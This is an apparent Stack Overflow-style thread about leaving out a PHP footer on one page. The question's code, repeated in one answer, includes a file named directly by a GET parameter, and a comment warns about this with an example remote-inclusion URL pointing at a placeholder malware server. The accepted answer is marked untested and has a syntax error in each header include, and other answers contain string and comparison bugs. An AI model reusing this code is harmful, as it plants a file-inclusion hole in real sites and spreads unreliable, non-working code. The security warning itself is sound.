# How can I make php footer not appear on one specific page of my website?

Tags: php, html

I am trying to exclude a page from including code onto a webpage and can't think of a function that would accomplish this.

'''

```
include "header.php";

if ($_GET['page'] == ""){
    echo "<meta http-equiv='refresh' content='0; URL=/?page=home' />";
}else{
    $page = $_GET['page'];
    include $page.".php";
}

include "footer.php";

if ($GET['page'] == "handyman.php"){

}
```

'''

I just want this page to be excluded from showing the footer. Any direction would be greatly appreciated!

Comment: `$GET` is invalid variable, use `$_GET` global variable instead. For example `if ($_GET['page'] !== 'handyman') { include 'footer.php'; }`

Comment: 'handyman' is the page I dont want the footer to show up.

Comment: `$page = $_GET['page']; include $page.".php";` you are vulnerable to injection by passing a malicious url to your `$_GET` `$page`... someone could invoke your script as follow: `yourpage.php?page=http://malware.server.com/my_bad_script.php` be safe is the first rule... if remote inclusion is allowed...

Comment: @allesandro yea that does not sound good. I found this website lookiing into fixing it but do not fully understand the ramifications of leaving it like the way it is. https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion

Comment: use instead: `switch ($page) {
    case 'register':
        include("register.php");
        break;
    case 'signup':
        include("signup.php");
        break;
    case 'login':
        include("login.php");
        break;
    default:
        include("home.php");
}`

Comment: Can I include multiple pages after the case? for example '''switch ($page) { 
                    case 'register': include("register.php") include ("footer.php); 
                    break;

Comment: See my answer... is the required behavior and... is safe!

Comment: Don't forget to upvote my answer if sounds good for you my code...

Answer (score 0, accepted):

You can do safe using [Query String](https://www.php.net/manual/en/reserved.variables.server.php), [Parse_Str](https://www.php.net/manual/en/function.parse-str.php) and [Switch](https://www.php.net/manual/en/control-structures.switch.php), below the wished result:

```
<?php
  ini_set('default_charset', 'UTF-8');
  $gurl = $_SERVER['QUERY_STRING'];
  $ourl = array();
  parse_str($gurl, $ourl);
  if (isset($ourl['page']) || (!empty($ourl['page']))) {
    $page = htmlspecialchars($ourl['page'], ENT_QUOTES, 'UTF-8');
    switch ($page) {
      case 'register':
        include("header.php)";
        include("register.php");
        include("footer.php");
      break;
      case 'signup':
        include("header.php)";
        include("signup.php");
        include("footer.php");
      break;
      case 'login':
        include("header.php)";
        include("login.php");
        include("footer.php");
        break;
      case 'handyman':
        include("header.php)";
        include("handyman.php");
        #include("footer.php"); // footer not included
        break;
      default:
        include("header.php)";
        include("home.php");
        include("footer.php");
    }
  } else {
    exit("No available options...");
  }
?>
```

Not tested written on fly... use is simple:

`your_page.php?page=handyman`

`your_page.php?page=register`

`your_page.php?page=etc...`

Comment: Thank you @Alessandro for helping me! Have a fantastic evening

Answer (score 0):

Do a negativity test on the page you do NOT want the footer on.

```
if ($_GET['page'] != '"handyman'){
    include "footer.php";
}
```

Answer (score 0):

Your code should look like this.

```
include "header.php";

if ($_GET['page'] == ""){
    echo "<meta http-equiv='refresh' content='0; URL=/?page=home' />";
}else{
    $page = $_GET['page'];
    include $page.".php";
}

if ($_GET['page'] <> "handyman.php"){
      include "footer.php";   
}
```